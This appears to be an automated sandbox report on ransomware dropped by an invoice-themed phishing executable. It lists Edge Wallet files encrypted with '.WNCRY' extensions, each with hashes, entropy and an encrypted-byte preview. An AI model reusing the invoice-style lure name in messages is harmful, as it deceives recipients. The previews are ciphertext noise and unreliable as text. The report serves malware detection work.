                                                          Preview:WANACRY!.........t...%l.{.FWM.r..m.%h.S.~.....9.k]....C\D..D....b.,..4=E.8..a..-U.z..i.x....w{z^...8..O....T.h.-:.w..;l...<...\./{&..K .......mvi..D..G...T.D.....QA4.AZ....b4L.y{....H3.n@..#C.P............9...V|..O..9..g...._ ;7.D..1.t...Y.V..C..z.....I.x.l.G........-......... .Ot...b.w....yA..E...G..Duts:Z..g......;....w3..of...z.=.$...F. ....8.c...P..("n{c..AI...T..!.u..)$.A...tx]l.t.......g`....u..9z4../......<.Dh]..~..K..c~...<.$.....OR.g...w..)nt.......L...1'..3.n...\...B.E.1...*"I.6.qu.4...C.f...........+..y.J..r.....G.."....VL..U....=.elh..+`O."SH.9...W.e:k83W.&u...k....~....}.w..S.Y*./....C^..<....Y ./,U.......&4..+.z.,.F.dK.>..qQ....o.g,....g}.o]X....dN..tD..&....v......B..;H.i..Us...........V.B..!.7...x..T...@..=<...U..Y.~.f..&.AP."4.......:D....08.=bP....BpM..>.......#%U=C...R.^O.rS.;..w...=.........`.B.~|.....Bt..j.K.I.Ooi......c....13.j.D.$.0......dun...x.{.o<n..)/.]S......k..Z.....d....NX..T{R.........3!.Z.....3..oL...3......q

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\crypto.bundle.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):408
                                                          Entropy (8bit):7.343414000541552
                                                          Encrypted:false
                                                          SSDEEP:12:bkEYX0mfwDgqRMiN6WDqsh6w4+sTDy71ein:bkbIDBXNPussmJ71bn
                                                          MD5:FD2AA5737C74030CC9B3051001C36203
                                                          SHA1:FBA47A0D35D4FEB932BEA37CAD03306276E9843A
                                                          SHA-256:E0DCED8A0838844A0954FFCD73A10788016C1791FBEDC5D7F9F33C033FD77FAA
                                                          SHA-512:250023F2FC822E9C82175AD26209B550922D5F54D3F604B3A61512B4776C9D7163187EE8C100C3DEA333EE86226B61A378E1EAF93531903D5D1F963662A6EDF9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....6(,....L;.@sQp.)..7.Qc.v#..Wh{ou.....M.a...[.X..j......[Qe.u..k.....{H&.g...q.3..r.E%#..5.<1rX.i._1/.._...w.....)..Kbp.j_.u...`.........=..b.....4IFh+.j.....@..v..e.....W:.d......*.n........'x~.g.......*.B...~K.]\q....n..).qd._..#Q...d.F..=VSX....y........4.1K.g..../..k...,.No..8,8.........o..2D\....hp.c.d.#s.&..s.^`..c}<.i...L....C.....1@...K.Zb.bb.#7.m.....7E.........&..j

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\crypto.bundle.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):408
                                                          Entropy (8bit):7.343414000541552
                                                          Encrypted:false
                                                          SSDEEP:12:bkEYX0mfwDgqRMiN6WDqsh6w4+sTDy71ein:bkbIDBXNPussmJ71bn
                                                          MD5:FD2AA5737C74030CC9B3051001C36203
                                                          SHA1:FBA47A0D35D4FEB932BEA37CAD03306276E9843A
                                                          SHA-256:E0DCED8A0838844A0954FFCD73A10788016C1791FBEDC5D7F9F33C033FD77FAA
                                                          SHA-512:250023F2FC822E9C82175AD26209B550922D5F54D3F604B3A61512B4776C9D7163187EE8C100C3DEA333EE86226B61A378E1EAF93531903D5D1F963662A6EDF9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....6(,....L;.@sQp.)..7.Qc.v#..Wh{ou.....M.a...[.X..j......[Qe.u..k.....{H&.g...q.3..r.E%#..5.<1rX.i._1/.._...w.....)..Kbp.j_.u...`.........=..b.....4IFh+.j.....@..v..e.....W:.d......*.n........'x~.g.......*.B...~K.]\q....n..).qd._..#Q...d.F..=VSX....y........4.1K.g..../..k...,.No..8,8.........o..2D\....hp.c.d.#s.&..s.^`..c}<.i...L....C.....1@...K.Zb.bb.#7.m.....7E.........&..j

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\driver-signature.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):14632
                                                          Entropy (8bit):7.988175595480435
                                                          Encrypted:false
                                                          SSDEEP:192:2kukotY/Z5E/ehCLPvmWjt9U7iB1DzOnIOS6dMotqeyJh1dTFlLsrSdoz56FL/Y1:2kukD/3EWqPvm0gjImo7QjzY7g
                                                          MD5:FA1774F42FF9C625D88E1740B1AB37CD
                                                          SHA1:C120DE47B83F62DEB0BFA63FBEEDCCEEF26D07E0
                                                          SHA-256:9B47F705A758A507BC6C73E58268BA92A2CE35636E97D3DE53A14B8BD7D855DE
                                                          SHA-512:04C178C338847E53318180BAEEF6E3EA42E97FF487B43ED534E0FF85B2966FA7177FF372C7A5243EC3FF3D3676CA18BA7ED1FAF3B6B3EE0E16C90868A58181D8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!............iAn.n..J.W......{WV.........._R...m.}.[,..Ej..f..&.q..C.G:8.Kc..`.Dw.g..r.x..s..M..~U}.(u....i..Pp...+..UY.t....C`.Z..q.....fZPst..h.s.l.Z.dH.>..I.tv2.[...W|....N.....n..N&..W....P.s1z.V...Z.q..SRm@.&S......W.q..k....c....B..22...0............8.......Nt..)...\..wG.b..p.F......r...%q..L..B.i.."5.....Z:.s5..M.'...u....71.pgd..O.j.=NW...I.R6.&$b..4.X.T..0 .5....m......k}....q...W.vv..D...2<W...F..s..T.s....=....W2<z.'..).P....[.o..F.\....J...!G<..t#...........8...3KX"7l..?,.r:,lV.X.|..m#...n..M.q.#...=$...y.%G..O.....G.&...X..&..i)$.&.`..v.~}....l)..H.{G.Ah.Bbu...#!.....9..gH...m..t...E...D.....PW]f....M....4.I 0.N.(.s.....'O_..i..C_....:.%...b#.0...C...6N.~....]...}j".......{....`........Z.3.....MzFNT..2u.S..bF...-Pcv.y.<.#>S.}..,..@.H...7.=d.~y....~6W...4@.."....2."W...,.c..".5mV,.a.qA.nA..mb.....o...2./...=". ..../Y/.......Oc.qydK...."@QZ...43......"!...... H..a.$d......p..2.g(.FsYj.P.H.5....?.S.....{%....<<|........LDx

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\driver-signature.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):14632
                                                          Entropy (8bit):7.988175595480435
                                                          Encrypted:false
                                                          SSDEEP:192:2kukotY/Z5E/ehCLPvmWjt9U7iB1DzOnIOS6dMotqeyJh1dTFlLsrSdoz56FL/Y1:2kukD/3EWqPvm0gjImo7QjzY7g
                                                          MD5:FA1774F42FF9C625D88E1740B1AB37CD
                                                          SHA1:C120DE47B83F62DEB0BFA63FBEEDCCEEF26D07E0
                                                          SHA-256:9B47F705A758A507BC6C73E58268BA92A2CE35636E97D3DE53A14B8BD7D855DE
                                                          SHA-512:04C178C338847E53318180BAEEF6E3EA42E97FF487B43ED534E0FF85B2966FA7177FF372C7A5243EC3FF3D3676CA18BA7ED1FAF3B6B3EE0E16C90868A58181D8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!............iAn.n..J.W......{WV.........._R...m.}.[,..Ej..f..&.q..C.G:8.Kc..`.Dw.g..r.x..s..M..~U}.(u....i..Pp...+..UY.t....C`.Z..q.....fZPst..h.s.l.Z.dH.>..I.tv2.[...W|....N.....n..N&..W....P.s1z.V...Z.q..SRm@.&S......W.q..k....c....B..22...0............8.......Nt..)...\..wG.b..p.F......r...%q..L..B.i.."5.....Z:.s5..M.'...u....71.pgd..O.j.=NW...I.R6.&$b..4.X.T..0 .5....m......k}....q...W.vv..D...2<W...F..s..T.s....=....W2<z.'..).P....[.o..F.\....J...!G<..t#...........8...3KX"7l..?,.r:,lV.X.|..m#...n..M.q.#...=$...y.%G..O.....G.&...X..&..i)$.&.`..v.~}....l)..H.{G.Ah.Bbu...#!.....9..gH...m..t...E...D.....PW]f....M....4.I 0.N.(.s.....'O_..i..C_....:.%...b#.0...C...6N.~....]...}j".......{....`........Z.3.....MzFNT..2u.S..bF...-Pcv.y.<.#>S.}..,..@.H...7.=d.~y....~6W...4@.."....2."W...,.c..".5mV,.a.qA.nA..mb.....o...2./...=". ..../Y/.......Oc.qydK...."@QZ...43......"!...... H..a.$d......p..2.g(.FsYj.P.H.5....?.S.....{%....<<|........LDx

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\edge_driver.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1946312
                                                          Entropy (8bit):7.999906588517325
                                                          Encrypted:true
                                                          SSDEEP:49152:Qnj/AY4x1qqsqvaa1sNUNBpUnkxlOIfbAz:QnHUhQUfpUnwIITAz
                                                          MD5:CB012652C6D906AA0C012563524B874E
                                                          SHA1:42483487CB741760C7C4ECAD6477CF140317638D
                                                          SHA-256:7059371400F1954F0BBC064A7485F55DC3AF26C8C6DB67876C3192DA5869BD7C
                                                          SHA-512:137622F07BDF9D8922E71AAC3248DDD104BC391F0E0646F6D288CC9147B379820A940E2B455CA9EFC100269503DCB62D34CD8CD054793E66B0092D988189CD2F
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......fq...#....H..k.+C..o\......D.m.....s....&5.O.Z.3.i.w......#....:....C..D..g......z:..Vk3|..i...z.xT.......p.@.....F.:..L..[..X...k...;..S......p!.........~.a..apg.....a..0Q..q.`...V.S.S.U..,...C.8.=v..".s.t.J..8.._.HL.*:.L..>.4..U..X...mZ=..w._.............U:mwo.E..d........e.:K..6......w.M.Y.Nj..89..3.7...K.Uyk:...+...,.....f.8.u...._...............I,........1.......-.&.3P..J...Z.......OD3c.v......u/.d.wD......4p2..#.<.]...zFR>,.(..C...`.7.r..{....2Ql...L.o.....h....~;..&..hfX.MA&....{.U5./..p....F4)..7.x|Pqz.n....n..?X.5....`.X....U%......(j..R......v2.k\Y.q.....X....+.S/l/....]..rz5.f....T.\_.......f.l..v.#.2....%:RO..N.l..l..}?..~^<b/".%.'.C..2O...,..>Z...1.I.,...~W..y....9c....U......j.= _.>`v....$.S[.].M..1...Z.2...j}..".....>\.J.n.<.nIUnL\gE.....t.*.......g6.......h.#.H........n8".............j.2.Q..X..Eu../U.....u!..........t.....z.'W...ai"Y.(.....V....JI.3K*w(.S....iW.b......../.Vp.p....3(/.....9wjd...C.,.{..?L35|.#.Vid

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\edge_driver.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1946312
                                                          Entropy (8bit):7.999906588517325
                                                          Encrypted:true
                                                          SSDEEP:49152:Qnj/AY4x1qqsqvaa1sNUNBpUnkxlOIfbAz:QnHUhQUfpUnwIITAz
                                                          MD5:CB012652C6D906AA0C012563524B874E
                                                          SHA1:42483487CB741760C7C4ECAD6477CF140317638D
                                                          SHA-256:7059371400F1954F0BBC064A7485F55DC3AF26C8C6DB67876C3192DA5869BD7C
                                                          SHA-512:137622F07BDF9D8922E71AAC3248DDD104BC391F0E0646F6D288CC9147B379820A940E2B455CA9EFC100269503DCB62D34CD8CD054793E66B0092D988189CD2F
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......fq...#....H..k.+C..o\......D.m.....s....&5.O.Z.3.i.w......#....:....C..D..g......z:..Vk3|..i...z.xT.......p.@.....F.:..L..[..X...k...;..S......p!.........~.a..apg.....a..0Q..q.`...V.S.S.U..,...C.8.=v..".s.t.J..8.._.HL.*:.L..>.4..U..X...mZ=..w._.............U:mwo.E..d........e.:K..6......w.M.Y.Nj..89..3.7...K.Uyk:...+...,.....f.8.u...._...............I,........1.......-.&.3P..J...Z.......OD3c.v......u/.d.wD......4p2..#.<.]...zFR>,.(..C...`.7.r..{....2Ql...L.o.....h....~;..&..hfX.MA&....{.U5./..p....F4)..7.x|Pqz.n....n..?X.5....`.X....U%......(j..R......v2.k\Y.q.....X....+.S/l/....]..rz5.f....T.\_.......f.l..v.#.2....%:RO..N.l..l..}?..~^<b/".%.'.C..2O...,..>Z...1.I.,...~W..y....9c....U......j.= _.>`v....$.S[.].M..1...Z.2...j}..".....>\.J.n.<.nIUnL\gE.....t.*.......g6.......h.#.H........n8".............j.2.Q..X..Eu../U.....u!..........t.....z.'W...ai"Y.(.....V....JI.3K*w(.S....iW.b......../.Vp.p....3(/.....9wjd...C.,.{..?L35|.#.Vid

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\hub-signature.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1256
                                                          Entropy (8bit):7.846265239284472
                                                          Encrypted:false
                                                          SSDEEP:24:bkQMKcf0F3fB/SQirt9NwfXPc/AzteF8yWnC4PjFI7BqCqyyq:bkQkS3pcRg0/CeFrW7LFsR3
                                                          MD5:41FA123853ECC398FFB9CB8041C03B44
                                                          SHA1:931C6BB9D2FB5800368F9924CFB67EEDAD149B1A
                                                          SHA-256:B1919590562502A7C375637541A9F2C71E1D180792028250111648E01014C41C
                                                          SHA-512:A6D11B2B388943C41384EA304CB7119682C491A549BF51B77EB5063EE395063E2ED3EBE377B47FE32317CE8E6D12C6E99730E14250C123EE10AB245A36BF4F15
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....U6.f......Y..`..;.o...6@....B....'ew..i.D.....-eH..R.r.A9..mG..+?..e.W...s.Kzaj`f.Ym..s>....4F.W.G...S.... .o.:.=..Ve...[.....QE.xN...3^j.iv....o.....e.....~]....4.*2.>.jq .H.a...>....Wc..A.._Z .WvP.*.N|.c.{.........z.uQ.$....8W...B.?l.`l..............1^6B.RRLs......'%.....\.....7...&...A..d.e..Q.A..tU.|P.......t...c.......,}.sV....o..*.....T.|...j......v.VW.Q.!n$..=.\..X...ru..c1.F.i..#..-OgDj..0.=.. ..VC...o...)j.]..k....?..a.....o..].B..e.w.;.n..... 9.B.3-.....Zl.-.2d.=.a(.tC.k. .4 66...u.....m..u.9..c....T...U..RS.Kd..j......:..)>%..7agU..[.=..f..A....d&. G.....i..U.:.Q<....S....x.b...!.#...1.~......D...t.........\.].....z,l...k.N....8).......f.....S}N."..a.K.PC../.}..:.I/.*u.p....../......q.}.Q`...}... .......r....[/9.N.p..}.....3.:.O[..\...1x.BF.y..k.ZzN...K...46:.~.(.X.F..A9.k;.5....T..Kg1`.(.......i....|.......iI}.a.s...M]X..b..yx.T.C.j.?..[YM.6.h.$#MH.....j3.i3.?.A.I.........hu.*....!`.<..k....>.6.X.....

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\hub-signature.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1256
                                                          Entropy (8bit):7.846265239284472
                                                          Encrypted:false
                                                          SSDEEP:24:bkQMKcf0F3fB/SQirt9NwfXPc/AzteF8yWnC4PjFI7BqCqyyq:bkQkS3pcRg0/CeFrW7LFsR3
                                                          MD5:41FA123853ECC398FFB9CB8041C03B44
                                                          SHA1:931C6BB9D2FB5800368F9924CFB67EEDAD149B1A
                                                          SHA-256:B1919590562502A7C375637541A9F2C71E1D180792028250111648E01014C41C
                                                          SHA-512:A6D11B2B388943C41384EA304CB7119682C491A549BF51B77EB5063EE395063E2ED3EBE377B47FE32317CE8E6D12C6E99730E14250C123EE10AB245A36BF4F15
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....U6.f......Y..`..;.o...6@....B....'ew..i.D.....-eH..R.r.A9..mG..+?..e.W...s.Kzaj`f.Ym..s>....4F.W.G...S.... .o.:.=..Ve...[.....QE.xN...3^j.iv....o.....e.....~]....4.*2.>.jq .H.a...>....Wc..A.._Z .WvP.*.N|.c.{.........z.uQ.$....8W...B.?l.`l..............1^6B.RRLs......'%.....\.....7...&...A..d.e..Q.A..tU.|P.......t...c.......,}.sV....o..*.....T.|...j......v.VW.Q.!n$..=.\..X...ru..c1.F.i..#..-OgDj..0.=.. ..VC...o...)j.]..k....?..a.....o..].B..e.w.;.n..... 9.B.3-.....Zl.-.2d.=.a(.tC.k. .4 66...u.....m..u.9..c....T...U..RS.Kd..j......:..)>%..7agU..[.=..f..A....d&. G.....i..U.:.Q<....S....x.b...!.#...1.~......D...t.........\.].....z,l...k.N....8).......f.....S}N."..a.K.PC../.}..:.I/.*u.p....../......q.}.Q`...}... .......r....[/9.N.p..}.....3.:.O[..\...1x.BF.y..k.ZzN...K...46:.~.(.X.F..A9.k;.5....T..Kg1`.(.......i....|.......iI}.a.s...M]X..b..yx.T.C.j.?..[YM.6.h.$#MH.....j3.i3.?.A.I.........hu.*....!`.<..k....>.6.X.....

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\load-hub-i18n.bundle.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1624
                                                          Entropy (8bit):7.878408213502862
                                                          Encrypted:false
                                                          SSDEEP:24:bk1pm0Z8lFTYw65M6pvYwR3r4Ych8lKIIpgZ3CF6rmzxOVDpfEPdPbni3hxDjWE8:bk1Q0MVH1Ych8lup9bzxOV9wG3D92KR8
                                                          MD5:1EC089C1D29CBA7DEABFB6140F59967D
                                                          SHA1:18CCAFED2954FBA0DF3572221FD2814D3BA401A0
                                                          SHA-256:ED4FA70C4160FB49C5862DDEB3CD9DC0E777B4AF3E266E940AB28F217900760D
                                                          SHA-512:FD74FDF7045C7D0CF051A59F8C261D89A126FD09B30E3EDABFEB6C1814A3AEE8B9AFC15A92059AEAD6A2D459F89B29E9304F7A1C7956A2CA6E8D64E930FB9666
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......L.a.......X...Am..Dp..'`.F&p:.......:.....J.......e(luI.[.!.X>k3......$N....qJ.^..!..)........Re..".].C..w.k.[.t..*.-...i:'...a(..H.s.#"...Z.<.!.Zc^nxHp...jH.U..|K.gx`_.....'.<.}.uz.B...~fW....kU=7..ZP.....8..P./..)p.U..*@.y.<..J...J.n......4........h#..).b...3.....%.=.;..oQ.o.$[....;.j..gev.......!.....y`...*)..;..4.}.g....(..]....99...x.y.+zWh.L@.n.J..."U5....@.6tC..j..o...f..E0.$...........j..M8.]w#@.`RiU...e.)..[X"..?...t..K.d9.D.....%.w ......&s....0.....EYoa.5..y..EQ{!.../....[&...J..~[%.!SFV.I....m.Kt\~......w..,...K...$.......|.11.....l[\.F.+.....H|&I.^.RkJ..p.P..R3.L.!.h..O....cW..i..Z.Y..C...+L..Gq...,.Q....iZ...}.....F......t'..5..F..x....(.3.i>7o....f.9.?a.w..O...~.M..0.....Ej....B'....G.=b..F.(...B..b4..Ft/...C.(..l....4.$..Uu..'..%.{.1X.p.m...K.m>.....$....A(.I...I.z..(;..>g.s....Lg.O...N...;G.W.d<..O7....G....DA.........Q.."eZ...=.....U{...^...."q...Xd.xM?K.f........4.....1....:.~.e..X.....A..{...|8

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\load-hub-i18n.bundle.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1624
                                                          Entropy (8bit):7.878408213502862
                                                          Encrypted:false
                                                          SSDEEP:24:bk1pm0Z8lFTYw65M6pvYwR3r4Ych8lKIIpgZ3CF6rmzxOVDpfEPdPbni3hxDjWE8:bk1Q0MVH1Ych8lup9bzxOV9wG3D92KR8
                                                          MD5:1EC089C1D29CBA7DEABFB6140F59967D
                                                          SHA1:18CCAFED2954FBA0DF3572221FD2814D3BA401A0
                                                          SHA-256:ED4FA70C4160FB49C5862DDEB3CD9DC0E777B4AF3E266E940AB28F217900760D
                                                          SHA-512:FD74FDF7045C7D0CF051A59F8C261D89A126FD09B30E3EDABFEB6C1814A3AEE8B9AFC15A92059AEAD6A2D459F89B29E9304F7A1C7956A2CA6E8D64E930FB9666
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......L.a.......X...Am..Dp..'`.F&p:.......:.....J.......e(luI.[.!.X>k3......$N....qJ.^..!..)........Re..".].C..w.k.[.t..*.-...i:'...a(..H.s.#"...Z.<.!.Zc^nxHp...jH.U..|K.gx`_.....'.<.}.uz.B...~fW....kU=7..ZP.....8..P./..)p.U..*@.y.<..J...J.n......4........h#..).b...3.....%.=.;..oQ.o.$[....;.j..gev.......!.....y`...*)..;..4.}.g....(..]....99...x.y.+zWh.L@.n.J..."U5....@.6tC..j..o...f..E0.$...........j..M8.]w#@.`RiU...e.)..[X"..?...t..K.d9.D.....%.w ......&s....0.....EYoa.5..y..EQ{!.../....[&...J..~[%.!SFV.I....m.Kt\~......w..,...K...$.......|.11.....l[\.F.+.....H|&I.^.RkJ..p.P..R3.L.!.h..O....cW..i..Z.Y..C...+L..Gq...,.Q....iZ...}.....F......t'..5..F..x....(.3.i>7o....f.9.?a.w..O...~.M..0.....Ej....B'....G.=b..F.(...B..b4..Ft/...C.(..l....4.$..Uu..'..%.{.1X.p.m...K.m>.....$....A(.I...I.z..(;..>g.s....Lg.O...N...;G.W.d<..O7....G....DA.........Q.."eZ...=.....U{...^...."q...Xd.xM?K.f........4.....1....:.~.e..X.....A..{...|8

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\runtime.bundle.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2424
                                                          Entropy (8bit):7.918030676554136
                                                          Encrypted:false
                                                          SSDEEP:48:bk1W2OuNTWBKa39zNDGs+TDZlYjNbGl4exKhNhN11+pAWzWkf+:o1W2rNKB739RS7DH68U0Ykf+
                                                          MD5:30831F1475336A68C61EDEA798A0671C
                                                          SHA1:56EA9296D31A0E519C8146DF6B15FFCBD963413D
                                                          SHA-256:4D47D880549768044750D46B010455F58B5B5F4D4F89CBD5D2608B68CCC27E21
                                                          SHA-512:7515926FCD5BFC0E1A4631E9BEA323014565248AC2139E0C7127C1A46E0B924030826C4BD0901B96C1CAA09B8D8046F2F8B136E802475719A0AA23812D67835E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......u...)_.....\q.".M.i.....1..D..m}..]l?.H.f'..A*.....Wr.....%.......-......S...&e..J7..w..*..gd.,Z..1:.+..9.e.(.B....\=2.`.<.w...`.A".....-y..q.;;&c.3b.Q.+..)n../.C..?oN.Kg..... ..@.K..So.'Y-k..e9...Ucw..*%%.....{.E..;.\h.T.o?.W..*.#6..145_..<....^.......e..w.k.1....C..r..0D\8y5Xe......4....I,R...Qa._{W...'y.).e.$...\.MJ.R........>T....J..x..\..7*b....=.8...T.i.....,:~.+.K.%...n.....c..r"...W...@q?....5.x.k...q,._*..-8.[|8....i.%.,+.h.J.wB.{$g..C...c...<k.J..$.'<..#-.^......^R ......}=.Xv.7/....9.:(..........<j..4..PB.f.G.m...|.U....=....k.\jF..r3. ..3..G...]{..3o..]...c......oO....w.xj.}.E.1.nmw.i7..!.U.j.p..l.b2c..H*0.e<.>..s!.z.O........i.A!....3....75u..=.....h..H...J.....(a.=jj&J.F.j.i..R.Ob.......+D..+.> .^/#..y{S...U.........wC.....A.F..g...30.F..#.RA.....%h.\j:.Y......-.B...e...}G...I7...n...o....j'.o.O..#....3.?.W.Q.D]I#b...N,..n.du.....t.;.6(..D0.?..l.C..T|T..O=...}....S.es.....b=.5.m..g.G......r.....".:....v.....

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\runtime.bundle.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2424
                                                          Entropy (8bit):7.918030676554136
                                                          Encrypted:false
                                                          SSDEEP:48:bk1W2OuNTWBKa39zNDGs+TDZlYjNbGl4exKhNhN11+pAWzWkf+:o1W2rNKB739RS7DH68U0Ykf+
                                                          MD5:30831F1475336A68C61EDEA798A0671C
                                                          SHA1:56EA9296D31A0E519C8146DF6B15FFCBD963413D
                                                          SHA-256:4D47D880549768044750D46B010455F58B5B5F4D4F89CBD5D2608B68CCC27E21
                                                          SHA-512:7515926FCD5BFC0E1A4631E9BEA323014565248AC2139E0C7127C1A46E0B924030826C4BD0901B96C1CAA09B8D8046F2F8B136E802475719A0AA23812D67835E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......u...)_.....\q.".M.i.....1..D..m}..]l?.H.f'..A*.....Wr.....%.......-......S...&e..J7..w..*..gd.,Z..1:.+..9.e.(.B....\=2.`.<.w...`.A".....-y..q.;;&c.3b.Q.+..)n../.C..?oN.Kg..... ..@.K..So.'Y-k..e9...Ucw..*%%.....{.E..;.\h.T.o?.W..*.#6..145_..<....^.......e..w.k.1....C..r..0D\8y5Xe......4....I,R...Qa._{W...'y.).e.$...\.MJ.R........>T....J..x..\..7*b....=.8...T.i.....,:~.+.K.%...n.....c..r"...W...@q?....5.x.k...q,._*..-8.[|8....i.%.,+.h.J.wB.{$g..C...c...<k.J..$.'<..#-.^......^R ......}=.Xv.7/....9.:(..........<j..4..PB.f.G.m...|.U....=....k.\jF..r3. ..3..G...]{..3o..]...c......oO....w.xj.}.E.1.nmw.i7..!.U.j.p..l.b2c..H*0.e<.>..s!.z.O........i.A!....3....75u..=.....h..H...J.....(a.=jj&J.F.j.i..R.Ob.......+D..+.> .^/#..y{S...U.........wC.....A.F..g...30.F..#.RA.....%h.\j:.Y......-.B...e...}G...I7...n...o....j'.o.O..#....3.?.W.Q.D]I#b...N,..n.du.....t.;.6(..D0.?..l.C..T|T..O=...}....S.es.....b=.5.m..g.G......r.....".:....v.....

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\shopping_iframe_driver.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):28904
                                                          Entropy (8bit):7.9943617265517135
                                                          Encrypted:true
                                                          SSDEEP:768:jE0O6Jhvdg9otXxGcSaf3Fu/zhdurxlfJRsbNeCX:jE89g9o9xGqs7hsdlfJRsbNeCX
                                                          MD5:1AE80786BB7600618DE6A8199D468FD6
                                                          SHA1:562B2EA9482E92012F3C41B5D33D92CD9DFC318B
                                                          SHA-256:C324EAF8BC55F0F1335DB73D57B3B437712F11027ED85574792C3F3691BA4D52
                                                          SHA-512:AFA4B6133A2AAB2E5C3E0BA84B4968D55D1B0DA4C2345140F95D125E0797E8C4CE4470EDD5D806C685CBAAC4D70B08A6947CB52D0F6B9647418BC6F79DBA8DD5
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....1..Z.^:H..aGoX.Q......$.........\]....[<4/TL..O...b. .].:..........!.X.V...\....l.......=.........z.z@!.!..O.M......8....~@....-.....o./N#.D....L..V..w..G#X...q...G....1...v..H.. 1...H.....&.q....k..X..)z.,>..s.q.:.\....l........s|iU........o........h~>.=~.:f.~.h\..$.)....~....s....`.-...&-.a4........5...7.d....t|AZ.....`....>!...u..$G3.M#@..b.8i....S3....R..p..M.. .=..W.K..#.M.r...7.w.cI&<.].<I...0..1.C..........o..I....\.:c............f.G.Qz.....T.]...>.GP....~..y......). .P"B........E...cw..>X......y..[.V....x|..z-...#.....3sr.q...sh...!.....u.<b..r.7..99.....hz.K...g..#..l?.W^.N/.P...u..}.bg..f%C|.M.z-....f.C.IJNMOX.,..."........W.=2..$..?....'.B.g.3J..a5.....5.......T...".x!.....C.OB.&P....:.^#..S...G.8.I......$+V..~t......e.(.!x...3..G.?..@=..J..c.@.....F....z..B.:.'_.P.T$...m....>\..-.Q.y.m....E.Bg.y..A.\;.....O...o..\fC....O.B...`.r....r..A..$d....%.Y.8....p<.....b...M..D.....0A$....u.d.1....z{..g...JX.-..J.3..C.4..p.D

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\shopping_iframe_driver.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
